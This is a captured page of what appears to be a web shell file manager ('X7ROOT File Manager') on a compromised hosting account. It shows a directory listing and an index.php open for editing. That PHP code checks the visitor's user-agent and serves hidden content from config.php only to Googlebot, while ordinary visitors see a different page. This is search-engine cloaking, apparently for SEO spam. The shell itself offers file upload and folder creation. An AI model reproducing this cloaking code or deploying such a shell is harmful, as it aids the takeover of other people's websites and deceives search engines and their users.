X7ROOT File Manager
Current Path:
/home/jurarevi/public_html/indexation
home
/
jurarevi
/
public_html
/
indexation
/
📁
..
📄
config.php
(981.35 KB)
📄
google4fc906492b7a6aa2.html
(53 B)
📄
index.php
(663 B)
📄
style.php
(16.51 KB)
Editing: index.php
<?php function is_google_bot() { $agents = array("Googlebot", "Google-Site-Verification", "Google-InspectionTool", "Googlebot-Mobile", "Googlebot-News"); foreach ($agents as $agent) { if (strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false) return true; } return false; } // Ambil user-agent dari pengunjung $userAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Deteksi Googlebot atau Google Inspection Tool if (strpos($userAgent, 'googlebot') !== false || strpos($userAgent, 'google-inspectiontool') !== false) { // Tampilkan konten dari config.php include 'config.php'; } ?> <?php include('style.php');?>
Upload File
Create Folder